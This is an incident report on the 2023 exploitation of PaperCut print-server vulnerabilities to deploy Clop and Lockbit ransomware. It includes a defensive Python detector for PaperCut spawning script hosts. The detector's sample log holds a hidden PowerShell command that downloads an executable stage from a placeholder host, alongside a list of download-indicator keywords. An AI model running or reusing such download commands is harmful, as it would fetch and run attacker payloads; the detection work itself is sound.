Cyber Incident Victim: PaperCut
Date: Apr 2023
Location: United States of America
Summary
A financially motivated threat actor exploited critical vulnerabilities in PaperCut print management software to deploy Clop ransomware. The attack, attributed to the Lace Tempest group, enabled unauthorized remote access to victim systems. This resulted in the theft of sensitive user data, including names, email addresses, and payment card information. The same vulnerabilities were also leveraged in other intrusions to deliver the Lockbit ransomware. PaperCut software is widely used by tens of thousands of organizations globally.
Description
On or around April 13, 2023, a financially motivated threat actor tracked by Microsoft as Lace Tempest began exploiting two vulnerabilities in PaperCut print management software. These vulnerabilities, identified as CVE-2023-27350 and CVE-2023-27351, had been initially reported to PaperCut by Trend Micro researchers on January 10, 2023. PaperCut, a developer of printing management software for major brands like Canon, Epson, and Xerox, published its first advisory regarding the vulnerabilities on March 8, 2023, and released a fix for the bugs on that date. The software is used by over 70,000 organizations globally, including government agencies, universities, and large corporations.

The exploitation of these vulnerabilities provided remote access to unpatched PaperCut servers on customer networks. The bugs allowed attackers to extract sensitive information stored within a customer’s servers. This information included usernames, full names, email addresses, and payment card numbers associated with user accounts. Microsoft attributed these attacks to the Lace Tempest group, which is known to have overlapping activities with the FIN11 and TA505 threat actors. This group operates as an affiliate for the Clop ransomware operation, carrying out attacks and deploying the ransomware in exchange for a commission from successful extortions.
Microsoft publicly disclosed its attribution of the attacks to Lace Tempest via a series of tweets on April 26, 2023. The company stated it was monitoring these intrusions, which were specifically leading to the deployment of Clop ransomware. Once the attackers gained access to a vulnerable PaperCut server, they used several PowerShell commands to deliver a malware downloader known as TrueBot. The TrueBot downloader was created by a Russian-speaking hacking group known as Silence, which has been responsible for high-impact attacks on financial institutions in multiple countries.
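The behaviour described above, a print-management server process launching PowerShell to fetch a downloader, is the kind of parent/child relationship a defender can alert on. The detector below is an added example written for this page, not code from PaperCut, Microsoft or the incident reporter. It assumes `pc-app.exe` is the PaperCut application server process (adjust to the real service name in your environment), and the pipe-delimited process-creation records it parses are constructed for the example.

```python
"""Flag script hosts spawned by the PaperCut application server process.

Added example for this page. Assumptions (not taken from the page):
  - the PaperCut server runs as `pc-app.exe`;
  - process-creation records arrive as pipe-delimited lines
    timestamp|host|parent_image|image|command_line (constructed format).
"""
from dataclasses import dataclass
from typing import Iterable, List

# Assumed name of the PaperCut application server process.
PAPERCUT_SERVER_PROCESSES = {"pc-app.exe"}
# Interpreters a print-management server has no routine reason to launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Command-line substrings that hint at a downloader stage.
DOWNLOAD_HINTS = (
    "downloadstring",
    "downloadfile",
    "invoke-webrequest",
    "-enc",
    "frombase64string",
)


@dataclass
class ProcessEvent:
    timestamp: str
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class Alert:
    host: str
    timestamp: str
    child: str
    reason: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one pipe-delimited record; the command line may itself contain no pipes."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        raise ValueError(f"malformed record: {line!r}")
    ts, host, parent, image, cmd = parts
    return ProcessEvent(ts, host, parent, image, cmd)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(lines: Iterable[str]) -> List[Alert]:
    """Return one Alert per record where the PaperCut server spawned a script host."""
    alerts: List[Alert] = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        parent = basename(ev.parent_image)
        child = basename(ev.image)
        if parent not in PAPERCUT_SERVER_PROCESSES or child not in SCRIPT_HOSTS:
            continue
        lowered = ev.command_line.lower()
        hints = [h for h in DOWNLOAD_HINTS if h in lowered]
        reason = f"{parent} spawned {child}"
        if hints:
            reason += " with download indicators: " + ", ".join(hints)
        alerts.append(Alert(ev.host, ev.timestamp, child, reason))
    return alerts


# Constructed sample records: two that should alert, two that should not.
SAMPLE_LOG = [
    r"2023-04-14T02:11:07Z|print01|C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe"
    r"|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell.exe -nop -w hidden -c Invoke-WebRequest http://example.invalid/stage -OutFile C:\Windows\Temp\stage.exe",
    r"2023-04-14T02:11:09Z|print01|C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe"
    r"|C:\Windows\System32\cmd.exe|cmd.exe /c whoami",
    r"2023-04-14T08:00:00Z|ws042|C:\Windows\explorer.exe"
    r"|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File backup.ps1",
    r"2023-04-14T08:05:00Z|print01|C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe"
    r"|C:\Program Files\PaperCut MF\runtime\jre\bin\java.exe|java.exe -jar reporting.jar",
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"[{a.timestamp}] {a.host}: {a.reason}")
```

The parent/child rule is the heart of the detection and fires regardless of command-line content; the download-hint list only enriches the alert, so an attacker obfuscating the command line still trips the rule. In a real deployment the same logic maps onto Windows Security event 4688 or Sysmon event 1 fields rather than the constructed pipe format used here.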
This method of initial access and deployment was consistent with Lace Tempest's previous tactics. The group has been historically observed using exploits for Fortra’s GoAnywhere file transfer product and the Raspberry Robin worm to deliver ransomware. Both of these techniques are commonly associated with the broader Clop ransomware operation. The ultimate objective of these intrusions was to deploy Clop ransomware onto victim networks, encrypt files, and exfiltrate corporate data to facilitate extortion demands.
The scope of the incident was significant due to the widespread use of PaperCut software. The Cybersecurity and Infrastructure Security Agency (CISA) also issued a warning at the time, confirming that hackers had successfully exploited these vulnerabilities to gain initial access to customer networks. The incident impacted a wide range of sectors that utilized the vulnerable PaperCut software for managing their print infrastructure. The primary impact was the theft of sensitive corporate data and the subsequent deployment of ransomware, leading to operational disruption and potential financial losses from extortion.
Microsoft noted that the exploitation of these vulnerabilities was not limited to a single threat group. While Lace Tempest was identified as the actor deploying Clop ransomware, Microsoft also stated it was monitoring other attacks exploiting the same PaperCut vulnerabilities. These other intrusions were observed leading to the deployment of Lockbit, another major ransomware operation. This indicated that multiple threat actors had begun to leverage the same vulnerabilities for their own attacks, suggesting the potential for a broader campaign affecting a larger number of organizations.
The response to the incident involved multiple layers of disclosure and public guidance. PaperCut’s initial advisory on March 8 provided the necessary patches to remediate the vulnerabilities. Following the observed exploitation in mid-April, cybersecurity firms and government agencies amplified warnings to ensure organizations applied the available patches. CISA’s warning served as a public alert to all organizations, particularly those in critical infrastructure sectors, to patch their systems immediately to prevent compromise. The public attribution by Microsoft provided valuable threat intelligence to the security community, identifying the specific groups involved and their tools, techniques, and procedures.
The consequences of the incident were data theft and system compromise. The confirmed impact was the exfiltration of user data from victim servers, which included personally identifiable information and financial data in the form of payment card numbers. For organizations where the ransomware was successfully deployed, the consequences also included system-wide encryption of files and significant operational disruption. The incident demonstrated the continued targeting of widely used software appliances for initial access by ransomware affiliates, highlighting the critical importance of prompt patching for internet-facing systems. The use of the PaperCut vulnerabilities by Lace Tempest represented another evolution in the group's methods for gaining initial access to corporate networks to carry out their financially motivated attacks.
